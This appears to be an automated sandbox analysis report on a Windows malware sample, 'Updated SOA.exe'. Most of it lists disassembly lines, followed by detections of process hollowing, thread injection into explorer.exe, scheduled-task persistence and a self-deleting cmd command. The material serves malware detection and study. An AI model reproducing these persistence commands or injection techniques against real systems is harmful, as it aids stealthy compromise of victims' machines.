          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A138B mov eax, dword ptr fs:[00000030h]7_2_010A138B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01081B8F mov eax, dword ptr fs:[00000030h]7_2_01081B8F
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01081B8F mov eax, dword ptr fs:[00000030h]7_2_01081B8F
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0112D380 mov ecx, dword ptr fs:[00000030h]7_2_0112D380
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113138A mov eax, dword ptr fs:[00000030h]7_2_0113138A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AB390 mov eax, dword ptr fs:[00000030h]7_2_010AB390
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2397 mov eax, dword ptr fs:[00000030h]7_2_010A2397
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A4BAD mov eax, dword ptr fs:[00000030h]7_2_010A4BAD
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A4BAD mov eax, dword ptr fs:[00000030h]7_2_010A4BAD
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A4BAD mov eax, dword ptr fs:[00000030h]7_2_010A4BAD
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01145BA5 mov eax, dword ptr fs:[00000030h]7_2_01145BA5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F53CA mov eax, dword ptr fs:[00000030h]7_2_010F53CA
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F53CA mov eax, dword ptr fs:[00000030h]7_2_010F53CA
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109DBE9 mov eax, dword ptr fs:[00000030h]7_2_0109DBE9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A03E2 mov eax, dword ptr fs:[00000030h]7_2_010A03E2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A03E2 mov eax, dword ptr fs:[00000030h]7_2_010A03E2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A03E2 mov eax, dword ptr fs:[00000030h]7_2_010A03E2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A03E2 mov eax, dword ptr fs:[00000030h]7_2_010A03E2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A03E2 mov eax, dword ptr fs:[00000030h]7_2_010A03E2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A03E2 mov eax, dword ptr fs:[00000030h]7_2_010A03E2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011223E3 mov ecx, dword ptr fs:[00000030h]7_2_011223E3
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011223E3 mov ecx, dword ptr fs:[00000030h]7_2_011223E3
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011223E3 mov eax, dword ptr fs:[00000030h]7_2_011223E3
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01088A0A mov eax, dword ptr fs:[00000030h]7_2_01088A0A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113AA16 mov eax, dword ptr fs:[00000030h]7_2_0113AA16
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113AA16 mov eax, dword ptr fs:[00000030h]7_2_0113AA16
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107AA16 mov eax, dword ptr fs:[00000030h]7_2_0107AA16
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107AA16 mov eax, dword ptr fs:[00000030h]7_2_0107AA16
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01093A1C mov eax, dword ptr fs:[00000030h]7_2_01093A1C
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01075210 mov eax, dword ptr fs:[00000030h]7_2_01075210
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01075210 mov ecx, dword ptr fs:[00000030h]7_2_01075210
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01075210 mov eax, dword ptr fs:[00000030h]7_2_01075210
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01075210 mov eax, dword ptr fs:[00000030h]7_2_01075210
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B4A2C mov eax, dword ptr fs:[00000030h]7_2_010B4A2C
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B4A2C mov eax, dword ptr fs:[00000030h]7_2_010B4A2C
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B236 mov eax, dword ptr fs:[00000030h]7_2_0109B236
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B236 mov eax, dword ptr fs:[00000030h]7_2_0109B236
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B236 mov eax, dword ptr fs:[00000030h]7_2_0109B236
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B236 mov eax, dword ptr fs:[00000030h]7_2_0109B236
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B236 mov eax, dword ptr fs:[00000030h]7_2_0109B236
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B236 mov eax, dword ptr fs:[00000030h]7_2_0109B236
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113EA55 mov eax, dword ptr fs:[00000030h]7_2_0113EA55
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01079240 mov eax, dword ptr fs:[00000030h]7_2_01079240
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01079240 mov eax, dword ptr fs:[00000030h]7_2_01079240
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01079240 mov eax, dword ptr fs:[00000030h]7_2_01079240
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01079240 mov eax, dword ptr fs:[00000030h]7_2_01079240
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01104257 mov eax, dword ptr fs:[00000030h]7_2_01104257
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B927A mov eax, dword ptr fs:[00000030h]7_2_010B927A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0112B260 mov eax, dword ptr fs:[00000030h]7_2_0112B260
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0112B260 mov eax, dword ptr fs:[00000030h]7_2_0112B260
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01148A62 mov eax, dword ptr fs:[00000030h]7_2_01148A62
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AD294 mov eax, dword ptr fs:[00000030h]7_2_010AD294
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AD294 mov eax, dword ptr fs:[00000030h]7_2_010AD294
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010752A5 mov eax, dword ptr fs:[00000030h]7_2_010752A5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010752A5 mov eax, dword ptr fs:[00000030h]7_2_010752A5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010752A5 mov eax, dword ptr fs:[00000030h]7_2_010752A5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010752A5 mov eax, dword ptr fs:[00000030h]7_2_010752A5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010752A5 mov eax, dword ptr fs:[00000030h]7_2_010752A5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108AAB0 mov eax, dword ptr fs:[00000030h]7_2_0108AAB0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108AAB0 mov eax, dword ptr fs:[00000030h]7_2_0108AAB0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AFAB0 mov eax, dword ptr fs:[00000030h]7_2_010AFAB0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2ACB mov eax, dword ptr fs:[00000030h]7_2_010A2ACB
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2AE4 mov eax, dword ptr fs:[00000030h]7_2_010A2AE4
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01148D34 mov eax, dword ptr fs:[00000030h]7_2_01148D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113E539 mov eax, dword ptr fs:[00000030h]7_2_0113E539
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A4D3B mov eax, dword ptr fs:[00000030h]7_2_010A4D3B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A4D3B mov eax, dword ptr fs:[00000030h]7_2_010A4D3B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A4D3B mov eax, dword ptr fs:[00000030h]7_2_010A4D3B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107AD30 mov eax, dword ptr fs:[00000030h]7_2_0107AD30
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010FA537 mov eax, dword ptr fs:[00000030h]7_2_010FA537
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B3D43 mov eax, dword ptr fs:[00000030h]7_2_010B3D43
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F3540 mov eax, dword ptr fs:[00000030h]7_2_010F3540
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01123D40 mov eax, dword ptr fs:[00000030h]7_2_01123D40
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01097D50 mov eax, dword ptr fs:[00000030h]7_2_01097D50
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109C577 mov eax, dword ptr fs:[00000030h]7_2_0109C577
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109C577 mov eax, dword ptr fs:[00000030h]7_2_0109C577
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2581 mov eax, dword ptr fs:[00000030h]7_2_010A2581
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2581 mov eax, dword ptr fs:[00000030h]7_2_010A2581
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2581 mov eax, dword ptr fs:[00000030h]7_2_010A2581
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2581 mov eax, dword ptr fs:[00000030h]7_2_010A2581
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01072D8A mov eax, dword ptr fs:[00000030h]7_2_01072D8A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01072D8A mov eax, dword ptr fs:[00000030h]7_2_01072D8A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01072D8A mov eax, dword ptr fs:[00000030h]7_2_01072D8A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01072D8A mov eax, dword ptr fs:[00000030h]7_2_01072D8A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01072D8A mov eax, dword ptr fs:[00000030h]7_2_01072D8A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AFD9B mov eax, dword ptr fs:[00000030h]7_2_010AFD9B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AFD9B mov eax, dword ptr fs:[00000030h]7_2_010AFD9B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D82 mov eax, dword ptr fs:[00000030h]7_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D82 mov eax, dword ptr fs:[00000030h]7_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D82 mov eax, dword ptr fs:[00000030h]7_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D82 mov eax, dword ptr fs:[00000030h]7_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D82 mov eax, dword ptr fs:[00000030h]7_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D82 mov eax, dword ptr fs:[00000030h]7_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D82 mov eax, dword ptr fs:[00000030h]7_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A35A1 mov eax, dword ptr fs:[00000030h]7_2_010A35A1
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011405AC mov eax, dword ptr fs:[00000030h]7_2_011405AC
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011405AC mov eax, dword ptr fs:[00000030h]7_2_011405AC
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A1DB5 mov eax, dword ptr fs:[00000030h]7_2_010A1DB5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A1DB5 mov eax, dword ptr fs:[00000030h]7_2_010A1DB5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A1DB5 mov eax, dword ptr fs:[00000030h]7_2_010A1DB5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6DC9 mov eax, dword ptr fs:[00000030h]7_2_010F6DC9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6DC9 mov eax, dword ptr fs:[00000030h]7_2_010F6DC9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6DC9 mov eax, dword ptr fs:[00000030h]7_2_010F6DC9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6DC9 mov ecx, dword ptr fs:[00000030h]7_2_010F6DC9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6DC9 mov eax, dword ptr fs:[00000030h]7_2_010F6DC9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6DC9 mov eax, dword ptr fs:[00000030h]7_2_010F6DC9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01128DF1 mov eax, dword ptr fs:[00000030h]7_2_01128DF1
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108D5E0 mov eax, dword ptr fs:[00000030h]7_2_0108D5E0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108D5E0 mov eax, dword ptr fs:[00000030h]7_2_0108D5E0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113FDE2 mov eax, dword ptr fs:[00000030h]7_2_0113FDE2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113FDE2 mov eax, dword ptr fs:[00000030h]7_2_0113FDE2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113FDE2 mov eax, dword ptr fs:[00000030h]7_2_0113FDE2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113FDE2 mov eax, dword ptr fs:[00000030h]7_2_0113FDE2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6C0A mov eax, dword ptr fs:[00000030h]7_2_010F6C0A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6C0A mov eax, dword ptr fs:[00000030h]7_2_010F6C0A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6C0A mov eax, dword ptr fs:[00000030h]7_2_010F6C0A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6C0A mov eax, dword ptr fs:[00000030h]7_2_010F6C0A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0114740D mov eax, dword ptr fs:[00000030h]7_2_0114740D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0114740D mov eax, dword ptr fs:[00000030h]7_2_0114740D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0114740D mov eax, dword ptr fs:[00000030h]7_2_0114740D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010ABC2C mov eax, dword ptr fs:[00000030h]7_2_010ABC2C
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0110C450 mov eax, dword ptr fs:[00000030h]7_2_0110C450
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0110C450 mov eax, dword ptr fs:[00000030h]7_2_0110C450
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AA44B mov eax, dword ptr fs:[00000030h]7_2_010AA44B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109746D mov eax, dword ptr fs:[00000030h]7_2_0109746D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exe; Process queried: DebugPort
          Source: C:\Users\user\Desktop\Updated SOA.exe; Code function: 7_2_00409B50 LdrLoadDll
          Source: C:\Users\user\Desktop\Updated SOA.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Updated SOA.exe; Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: DF0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Updated SOA.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Updated SOA.exe; Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Updated SOA.exe; Memory written: C:\Users\user\Desktop\Updated SOA.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Updated SOA.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Updated SOA.exe; Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\cmmon32.exe; Thread register set: target process: 3388
          Source: C:\Users\user\Desktop\Updated SOA.exe; Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oydxFbGhGlh' /XML 'C:\Users\user\AppData\Local\Temp\tmp14E0.tmp'
          Source: C:\Users\user\Desktop\Updated SOA.exe; Process created: C:\Users\user\Desktop\Updated SOA.exe C:\Users\user\Desktop\Updated SOA.exe
          Source: C:\Windows\SysWOW64\cmmon32.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Updated SOA.exe'
          Source: explorer.exe, 00000008.00000000.243141131.0000000001398000.00000004.00000020.sdmp; Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000008.00000000.272559658.0000000001980000.00000002.00020000.sdmp, cmmon32.exe, 00000012.00000002.485586426.0000000002E00000.00000002.00020000.sdmp; Binary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.272559658.0000000001980000.00000002.00020000.sdmp, cmmon32.exe, 00000012.00000002.485586426.0000000002E00000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.272559658.0000000001980000.00000002.00020000.sdmp, cmmon32.exe, 00000012.00000002.485586426.0000000002E00000.00000002.00020000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.272559658.0000000001980000.00000002.00020000.sdmp, cmmon32.exe, 00000012.00000002.485586426.0000000002E00000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
